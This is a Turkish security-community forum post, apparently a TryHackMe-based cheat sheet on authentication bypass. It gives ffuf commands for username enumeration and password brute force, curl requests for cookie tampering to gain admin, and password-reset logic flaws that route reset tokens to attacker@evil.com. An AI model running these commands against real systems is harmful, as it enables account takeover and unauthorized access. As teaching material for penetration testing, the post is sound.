Neler yeni
Bughane Academy

Bughane Academy, bug bounty, web güvenliği ve sızma testi alanında kendini geliştirmek isteyenler için kurulmuş Türkçe odaklı bir topluluktur.

Burada; gerçek güvenlik açıkları, recon ve exploit teknikleri, payload & bypass yöntemleri, araçlar, scriptler ve write-up’lar topluluk tarafından paylaşılır ve tartışılır.

Birlikte öğren, birlikte üret, birlikte güçlen.

Authentication Bypass (Kimlik Doğrulama Atlama)

  • Konuyu Başlatan Konuyu Başlatan 1atakan1
  • Başlangıç tarihi Başlangıç tarihi

1atakan1

Moderator
Aday
Katılım
2 Ocak 2026
Mesajlar
19
Tepkime puanı
22
Puan
3

Authentication Bypass (Kimlik Doğrulama Atlama)​

Kullanıcı doğrulama akışında açıklar: username enumeration, brute force, mantık hatası ve cookie manipülasyonu. Kısa, PoC ve exploit odaklı.

Username Enumeration​

Signup veya login endpointlerinde kullanıcı var mı yok mu kontrol edilebilir.
PoC: ffuf -w names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -u http://10.10.218.173/customers/signup -mr "username already exists"
Ekran mesajına göre kullanıcı var/yarı var bilgisi alınır → brute force veya targeted attack için kullanılabilir.

Brute Force​

Valid username listesini kullanarak şifre tahmini yapılır.
PoC: ffuf -w valid_usernames.txt:W1,passwords.txt:W2 -X POST -d "username=W1&password=W2" -u http://10.10.218.173/customers/login -fc 200
Başarılı login status code veya response body üzerinden tespit edilir.

Logic Flaw / Flow Manipulation​

Normal akışta sensitive action (reset mail, transfer) sadece hedef kullanıcıya gider.
PoC: curl 'http://10.10.53.127/customers/reset?email=robert@acmeitsupport.thm' -d 'username=robert&email=attacker@domain.com' → robert’in reset maili attacker’a gider.
Mantık açığı, parametre veya endpoint validation eksikliğinden kaynaklanır.

Cookie Tampering​

Client-side cookie değerleri manipüle edilerek yetki yükseltme.
PoC Normal: curl http://10.10.53.127/cookie-test → Not Logged In
PoC User: curl -H "Cookie: logged_in=true; admin=false" http://10.10.53.127/cookie-test → Logged In As A User
PoC Admin: curl -H "Cookie: logged_in=true; admin=true" http://10.10.53.127/cookie-test → Logged In As Admin + flag

Şifre Sıfırlama Tokenı Sömürüsü (Logic Flaw)​

Senaryo: Şifre sıfırlama isteği gönderilirken, sunucu sıfırlama token'ını hedef kullanıcının e-postasına gönderir, ancak isteğin gövdesindeki (POST body) bir e-posta parametresini kullanır.

// Adım 1: Mağdurun (victim) e-postasını sıfırlama isteğine girilir.
POST /api/reset_password
Body: { "email": "victim@target.com" }

// Adım 2: Sunucu tokeni gönderirken Body'deki e-posta yerine
// URL parametresindeki (veya başka bir parametre) e-postayı kullanır.

// PoC: Saldırgan, hem mağdurun hem de kendi e-postasını gönderir.
POST /api/reset_password?email=attacker@evil.com
Body: { "email": "victim@target.com" }
Sunucu, token'ı Body'den alıp victim@target.com için oluşturur ancak token'ı göndereceği adresi Query Parameter'dan (attacker@evil.com) alır. Token, saldırgana ulaşır ve hesap ele geçirilir.
 
Geri
Üst